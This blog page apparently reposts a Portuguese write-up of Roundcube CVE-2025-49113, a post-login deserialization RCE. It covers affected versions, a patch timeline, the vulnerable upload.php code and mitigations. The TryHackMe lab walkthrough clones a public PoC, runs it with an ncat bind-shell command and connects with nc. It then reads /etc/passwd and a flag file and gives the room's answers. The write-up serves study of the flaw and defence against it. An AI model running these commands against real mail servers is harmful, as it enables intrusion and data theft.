

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=light>



<head>
  <meta charset="UTF-8">

  <link rel="apple-touch-icon" sizes="76x76" href="/img/fluid.png">
  <link rel="icon" href="/img/fluid.png">
  

  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="lianccc">
  <meta name="keywords" content="">
  
    <meta name="description" content="漏洞信息漏洞名称： Roundcube RCE Vulnerability 漏洞编号：  CVE： CVE-2025-49113  漏洞类型： 反序列化 漏洞等级： 高危 漏洞描述： Roundcube邮件系统中存在一个反序列化漏洞，允许攻击者在登录后执行远程命令。受影响的版本包括1.5.10及以下和1.6.10及以下。漏洞源于program&#x2F;actions&#x2F;settings&#x2F;upload.php">
<meta property="og:type" content="article">
<meta property="og:title" content="Roundcube RCE Vulnerability">
<meta property="og:url" content="http://example.com/2025/06/17/github_1537549973/index.html">
<meta property="og:site_name" content="liancc&#39; infos blog">
<meta property="og:description" content="漏洞信息漏洞名称： Roundcube RCE Vulnerability 漏洞编号：  CVE： CVE-2025-49113  漏洞类型： 反序列化 漏洞等级： 高危 漏洞描述： Roundcube邮件系统中存在一个反序列化漏洞，允许攻击者在登录后执行远程命令。受影响的版本包括1.5.10及以下和1.6.10及以下。漏洞源于program&#x2F;actions&#x2F;settings&#x2F;upload.php">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://example.com/images/Pastedimage20250616175835.png">
<meta property="og:image" content="http://example.com/images/Pastedimage20250616180500.png">
<meta property="og:image" content="http://example.com/images/Pastedimage20250616180745.png">
<meta property="og:image" content="http://example.com/images/Pastedimage20250616180844.png">
<meta property="og:image" content="http://example.com/images/Pastedimage20250616181115.png">
<meta property="og:image" content="http://example.com/images/Pastedimage20250616181246.png">
<meta property="article:published_time" content="2025-06-17T18:45:29.757Z">
<meta property="article:modified_time" content="2025-06-17T18:45:29.757Z">
<meta property="article:author" content="lianccc">
<meta property="article:tag" content="反序列化">
<meta property="article:tag" content="CVE-2025:github search">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="http://example.com/images/Pastedimage20250616175835.png">
  
  
  
  <title>Roundcube RCE Vulnerability - liancc&#39; infos blog</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1749284_5i9bdhy70f8.css">



<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1736178_k526ubmyhba.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"example.com","root":"/","version":"1.9.8","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"follow_dnt":true,"baidu":null,"google":{"measurement_id":null},"tencent":{"sid":null,"cid":null},"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false},"umami":{"src":null,"website_id":null,"domains":null,"start_time":"2024-01-01T00:00:00.000Z","token":null,"api_server":null}},"search_path":"/local-search.xml","include_content_in_search":true};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  


  
<meta name="generator" content="Hexo 7.3.0"><link rel="alternate" href="/atom.xml" title="liancc' infos blog" type="application/atom+xml">
</head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>Craw Info</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/" target="_self">
                <i class="iconfont icon-home-fill"></i>
                <span>首页</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/" target="_self">
                <i class="iconfont icon-archive-fill"></i>
                <span>归档</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/" target="_self">
                <i class="iconfont icon-category-fill"></i>
                <span>分类</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/" target="_self">
                <i class="iconfont icon-tags-fill"></i>
                <span>标签</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/" target="_self">
                <i class="iconfont icon-user-fill"></i>
                <span>关于</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/default.png') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="Roundcube RCE Vulnerability"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2025-06-17 18:45" pubdate>
          2025年6月17日 晚上
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          536 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          5 分钟
        
      </span>
    

    
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <h1 id="seo-header">Roundcube RCE Vulnerability</h1>
            
            
              <div class="markdown-body">
                
                <h1 id="漏洞信息"><a href="#漏洞信息" class="headerlink" title="漏洞信息"></a>漏洞信息</h1><p><strong>漏洞名称：</strong> Roundcube RCE Vulnerability</p>
<p><strong>漏洞编号：</strong></p>
<ul>
<li><strong>CVE：</strong> CVE-2025-49113</li>
</ul>
<p><strong>漏洞类型：</strong> 反序列化</p>
<p><strong>漏洞等级：</strong> 高危</p>
<p><strong>漏洞描述：</strong> Roundcube邮件系统中存在一个反序列化漏洞，允许攻击者在登录后执行远程命令。受影响的版本包括1.5.10及以下和1.6.10及以下。漏洞源于<code>program/actions/settings/upload.php</code>文件中<code>session-&gt;append()</code>函数的使用未进行充分验证，导致攻击者可以通过构造特定的<code>_from</code>参数注入恶意对象，进而在服务器上执行任意代码。</p>
<p><strong>产品厂商：</strong> Roundcube</p>
<p><strong>产品名称：</strong> Roundcube</p>
<p><strong>影响版本：</strong> ≤ 1.5.10 &#x2F; 1.6.10</p>
<p><strong>来源：</strong> <a target="_blank" rel="noopener" href="https://github.com/5kr1pt/Roundcube_CVE-2025-49113">https://github.com/5kr1pt/Roundcube_CVE-2025-49113</a></p>
<p><strong>类型：</strong> CVE-2025:github search</p>
<h1 id="仓库文件"><a href="#仓库文件" class="headerlink" title="仓库文件"></a>仓库文件</h1><ul>
<li>README.md</li>
<li>images</li>
</ul>
<h1 id="来源概述"><a href="#来源概述" class="headerlink" title="来源概述"></a>来源概述</h1><h2 id="RCE-no-Roundcube-CVE-2025-49113-Minha-anotacao-do-Obsidian-md"><a href="#RCE-no-Roundcube-CVE-2025-49113-Minha-anotacao-do-Obsidian-md" class="headerlink" title="RCE no Roundcube (CVE-2025-49113) - Minha anotação do Obsidian .md"></a>RCE no Roundcube (CVE-2025-49113) - Minha anotação do Obsidian .md</h2>1750185929757 

<p>Status: Completed</p>
<p>Tags: [[RCE]] | [[PHP]] | [[LAB]] | [[EXPLOIT]] | [[CVE]]</p>
<blockquote>
<p>by KRPT Paulo G. Werneck -    Linkedin - <a target="_blank" rel="noopener" href="https://www.linkedin.com/in/pgw-script">in.com&#x2F;pgw-script</a></p>
</blockquote>
<hr>
<blockquote>
<p><strong>Impacto</strong>: execução remota de comandos pós-login (CVSS 9.9)<br><strong>Versões afetadas</strong>: ≤ 1.5.10 &#x2F; 1.6.10<br><strong>Patched</strong>: 1.5.11 e 1.6.11</p>
</blockquote>
<hr>
<h3 id="1-–-Timeline"><a href="#1-–-Timeline" class="headerlink" title="1 – Timeline"></a>1 – Timeline</h3><table>
<thead>
<tr>
<th>Data</th>
<th>Evento</th>
</tr>
</thead>
<tbody><tr>
<td>~2014</td>
<td>Introdução da rota <code>program/actions/settings/upload.php</code> com uso de <code>session-&gt;append()</code> <strong>sem validação</strong>.</td>
</tr>
<tr>
<td>03 jun 2025</td>
<td>Pesquisadores da @FearsOff publicam o advisory e anunciam PoC.</td>
</tr>
<tr>
<td>04 jun 2025</td>
<td>Roundcube aplica <a target="_blank" rel="noopener" href="https://github.com/roundcube/roundcubemail/commit/0376f69e958a8fef7f6f09e352c541b4e7729c4d">commit 0376f69</a> (1.6-stable) e <a target="_blank" rel="noopener" href="https://github.com/roundcube/roundcubemail/commit/7408f31379666124a39f9cb1018f62bc5e2dc695">commit 7408f31</a> (1.5-lts).</td>
</tr>
<tr>
<td>06 jun 2025</td>
<td>PoC publicada no github . (<a target="_blank" rel="noopener" href="https://github.com/fearsoff-org/CVE-2025-49113">fearsoff-org&#x2F;CVE-2025-49113</a>)</td>
</tr>
<tr>
<td>10 jun 2025</td>
<td>Exploração em massa.</td>
</tr>
</tbody></table>
<hr>
<h3 id="2-–-Onde-estava-o-problema"><a href="#2-–-Onde-estava-o-problema" class="headerlink" title="2 – Onde estava o problema"></a>2 – Onde estava o problema</h3><h4 id="Codigo-vulneravel-1-6-10"><a href="#Codigo-vulneravel-1-6-10" class="headerlink" title="Código vulnerável (1.6.10)"></a>Código vulnerável (1.6.10)</h4><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-comment">// program/actions/settings/upload.php </span><br><span class="hljs-variable">$from</span> = rcube_utils::<span class="hljs-title function_ invoke__">get_input_string</span>(<span class="hljs-string">&#x27;_from&#x27;</span>, rcube_utils::<span class="hljs-variable constant_">INPUT_GET</span>);<br><span class="hljs-variable">$type</span> = <span class="hljs-title function_ invoke__">preg_replace</span>(<span class="hljs-string">&#x27;/(add|edit)-/&#x27;</span>, <span class="hljs-string">&#x27;&#x27;</span>, <span class="hljs-variable">$from</span>);<br><br><span class="hljs-comment">// … mais abaixo</span><br><span class="hljs-variable">$rcmail</span>-&gt;session-&gt;<span class="hljs-title function_ invoke__">append</span>(<span class="hljs-variable">$type</span> . <span class="hljs-string">&#x27;.files&#x27;</span>, <span class="hljs-variable">$id</span>, <span class="hljs-variable">$attachment</span>);<br><br></code></pre></td></tr></table></figure>

<p>A entrada <code>_from</code> chega completa do GET dps vira parte do nome de um nó na sessão e<br>durante o primeiro <code>append()</code>, o Roundcube faz:</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-comment">// program/actions/settings/upload.php</span><br><br><span class="hljs-variable">$from</span> = rcube_utils::<span class="hljs-title function_ invoke__">get_input_string</span>(<span class="hljs-string">&#x27;_from&#x27;</span>, rcube_utils::<span class="hljs-variable constant_">INPUT_GET</span>);<br><br><span class="hljs-variable">$type</span> = <span class="hljs-title function_ invoke__">preg_replace</span>(<span class="hljs-string">&#x27;/(add|edit)-/&#x27;</span>, <span class="hljs-string">&#x27;&#x27;</span>, <span class="hljs-variable">$from</span>);<br><br><span class="hljs-comment">// … mais abaixo</span><br><br><span class="hljs-variable">$rcmail</span>-&gt;session-&gt;<span class="hljs-title function_ invoke__">append</span>(<span class="hljs-variable">$type</span> . <span class="hljs-string">&#x27;.files&#x27;</span>, <span class="hljs-variable">$id</span>, <span class="hljs-variable">$attachment</span>);<br></code></pre></td></tr></table></figure>

<p>Se o arquivo existir, o RCE funcionou.</p>
<hr>
<h3 id="6-–-Mitigacoes"><a href="#6-–-Mitigacoes" class="headerlink" title="6 – Mitigações"></a>6 – Mitigações</h3><ol>
<li><p><strong>Atualize</strong> imediatamente para ≥ 1.6.11 ou ≥ 1.5.11.</p>
</li>
<li><p>Cao nao consiga atualizar, bloqueie qualquer <code>_from</code> contendo <code>%22</code>, <code>%7C</code>, <code>!</code>, <code>.</code> ou bytes de controle via WAF, firewall ou rewrite.</p>
</li>
<li><p>Desative funções perigosas (<code>proc_open</code>, <code>exec</code>, etc.) em <code>php.ini</code>.</p>
</li>
<li><p>Bloqueie uploads no painel de configurações e monitore logs.</p>
</li>
</ol>
<hr>
<h3 id="7-Lab-TryHackme-WriteUp"><a href="#7-Lab-TryHackme-WriteUp" class="headerlink" title="7 - Lab - TryHackme - WriteUp"></a>7 - Lab - TryHackme - WriteUp</h3><h5 id="1-Recon"><a href="#1-Recon" class="headerlink" title="1. Recon"></a>1. Recon</h5><ol>
<li><p>Abrir a VM (<code>MACHINE_IP</code>) e o AttackBox.</p>
</li>
<li><p>Acessar <code>http://MACHINE_IP/roundcube</code> com:</p>
<p> <code>usuário: ellieptic</code><br> <code>senha: ChangeMe123</code></p>
<p> Isso vai funcionar e vai logar normalmente:</p>
<p><img src="/images/Pastedimage20250616175835.png" srcset="/img/loading.gif" lazyload alt="Tela de login"></p>
</li>
</ol>
<hr>
<h5 id="2-Montar-o-exploit"><a href="#2-Montar-o-exploit" class="headerlink" title="2. Montar o exploit"></a>2. Montar o exploit</h5><p>Após verificar que está tudo up, vamos executar o exploit, para isso vamos acessar a PoC postada no github informada anteriormente e fazer um gitclone:</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-built_in">mkdir</span> tmp<br><span class="hljs-built_in">cd</span> tmp<br>git <span class="hljs-built_in">clone</span> https://github.com/fearsoff-org/CVE-2025-49113<br><span class="hljs-built_in">cd</span> CVE-2025-49113<br></code></pre></td></tr></table></figure>

<p><img src="/images/Pastedimage20250616180500.png" srcset="/img/loading.gif" lazyload alt="exploit"> </p>
<hr>
<h5 id="3-Preparar-o-payload"><a href="#3-Preparar-o-payload" class="headerlink" title="3. Preparar o payload"></a>3. Preparar o payload</h5><p>O uso do payload é simples, basta criar o bind shell e apontar para uma porta com o file <code>.php</code> seguindo o usage abaixo:</p>
<p>php CVE-2025-49113.php &lt;<code>site</code>&gt; &lt;<code>user</code>&gt; &lt;<code>senha</code>&gt; “&lt;<code>bind shell</code>&gt;”</p>
<p><code>php CVE-2025-49113.php http://MACHINE_IP/roundcube ellieptic ChangeMe123 &quot;ncat -lvnp 1337 -e /bin/bash&quot;</code></p>
<p>– O script faz login, injeta o objeto PHP malicioso no parâmetro <code>_from</code>, conforme falamos anteriormente, chama o endpoint <code>upload.php</code> e depois força logout para disparar<br><code>session_decode()</code> → <code>unserialize()</code> → <code>proc_open()</code>.</p>
<blockquote>
<p>Às vezes ele mostra erro de CSRF; ignore e siga para o próximo passo,<br>porque o comando costuma ter sido executado mesmo assim.</p>
</blockquote>
<p><img src="/images/Pastedimage20250616180745.png" srcset="/img/loading.gif" lazyload alt="exploit"> </p>
<hr>
<h5 id="4-Conectar-na-shell"><a href="#4-Conectar-na-shell" class="headerlink" title="4. Conectar na shell"></a>4. Conectar na shell</h5><p>Se a bind shell deu certo, ela ta escutando na porta 1337 que passamos, so fazermos a conexão nela agora:</p>
<p><code>nc MACHINE_IP 1337</code></p>
<p>Shell obtida.</p>
<p><img src="/images/Pastedimage20250616180844.png" srcset="/img/loading.gif" lazyload alt="shell"> </p>
<hr>
<h5 id="5-Respondendo-as-questoes"><a href="#5-Respondendo-as-questoes" class="headerlink" title="5. Respondendo as questões"></a>5. Respondendo as questões</h5><h4 id="Questoes-e-respostas"><a href="#Questoes-e-respostas" class="headerlink" title="Questões e respostas"></a>Questões e respostas</h4><ol>
<li><strong>Usuário Maggie</strong><br> <em>Pergunta:</em> Um dos usuários tem o primeiro nome <strong>Maggie</strong>. Qual é o sobrenome dela?<br> <em>Resposta:</em> <code>Byte</code></li>
</ol>
<p>Para resolver essa questão podiamos dar um cat em &#x2F;etc&#x2F;passwd grepando o usuário da maggie, ou simplesmente dando um <code>ls</code>em <code>/home</code></p>
<p>   <img src="/images/Pastedimage20250616181115.png" srcset="/img/loading.gif" lazyload alt="1">    </p>
<ol start="2">
<li><strong>Flag em &#x2F;etc</strong><br> <em>Pergunta:</em> Qual é o valor do sinalizador salvo em <code>/etc</code>?<br> <em>Resposta:</em> <code>THM&#123;ICE_CUBE_DESERIALISATION&#125;</code></li>
</ol>
<p>Para resolver isso, dei um <code>cat /etc/flag*</code> e por sorte o nome do arquivo era flag e com isso conseguimos capturar.<br>	<br>  <img src="/images/Pastedimage20250616181246.png" srcset="/img/loading.gif" lazyload alt="2"> </p>
<hr>
<h3 id="7-–-Referencias"><a href="#7-–-Referencias" class="headerlink" title="7 – Referências"></a>7 – Referências</h3><ul>
<li><p>Commit 1.6.11 – <a target="_blank" rel="noopener" href="https://github.com/roundcube/roundcubemail/commit/0376f69e958a8fef7f6f09e352c541b4e7729c4d">https://github.com/roundcube/roundcubemail/commit/0376f69e958a8fef7f6f09e352c541b4e7729c4d</a></p>
</li>
<li><p>Commit 1.5.11 – <a target="_blank" rel="noopener" href="https://github.com/roundcube/roundcubemail/commit/7408f31379666124a39f9cb1018f62bc5e2dc695">https://github.com/roundcube/roundcubemail/commit/7408f31379666124a39f9cb1018f62bc5e2dc695</a></p>
</li>
<li><p>FearsOff write-up – <a target="_blank" rel="noopener" href="https://fearsoff.org/research/roundcube">https://fearsoff.org/research/roundcube</a></p>
</li>
<li><p>OffSec blog – <a target="_blank" rel="noopener" href="https://www.offsec.com/blog/cve-2025-49113/">https://www.offsec.com/blog/cve-2025-49113/</a> <a target="_blank" rel="noopener" href="https://www.offsec.com/blog/cve-2025-49113/?utm_source=chatgpt.com">offsec.com</a></p>
</li>
<li><p>TryHackme - <a target="_blank" rel="noopener" href="https://tryhackme.com/room/roundcubecve202549113">TryHackMe | Roundcube: CVE-2025-49113</a> </p>
</li>
<li><p>GHSA advisory – <a target="_blank" rel="noopener" href="https://github.com/advisories/GHSA-8j8w-wwqc-x596">https://github.com/advisories/GHSA-8j8w-wwqc-x596</a> <a target="_blank" rel="noopener" href="https://github.com/advisories/GHSA-8j8w-wwqc-x596?utm_source=chatgpt.com">github.com</a></p>
</li>
</ul>

                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
    <div class="post-meta mr-3 d-flex align-items-center">
      <i class="iconfont icon-category"></i>
      

<span class="category-chains">
  
  
    
      <span class="category-chain">
        
  <a href="/categories/Github-Poc/" class="category-chain-item">Github Poc</a>
  
  

      </span>
    
  
</span>

    </div>
  
  
    <div class="post-meta">
      <i class="iconfont icon-tags"></i>
      
        <a href="/tags/%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/" class="print-no-link">#反序列化</a>
      
        <a href="/tags/CVE-2025-github-search/" class="print-no-link">#CVE-2025:github search</a>
      
    </div>
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>Roundcube RCE Vulnerability</div>
      <div>http://example.com/2025/06/17/github_1537549973/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>作者</div>
          <div>lianccc</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>发布于</div>
          <div>2025年6月17日</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>许可协议</div>
          <div>
            
              
              
                <a class="print-no-link" target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - 署名">
                    <i class="iconfont icon-cc-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2025/06/17/github_1545288377/" title="GeoServer WFS XXE处理漏洞">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">GeoServer WFS XXE处理漏洞</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2025/06/17/github_3768620690/" title="GlobalProtect 跨站可执行脚本漏洞">
                        <span class="hidden-mobile">GlobalProtect 跨站可执行脚本漏洞</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>目录</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
    </div>
  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.4/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.20.1/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/5.0.0/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/js/local-search.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
</body>
</html>
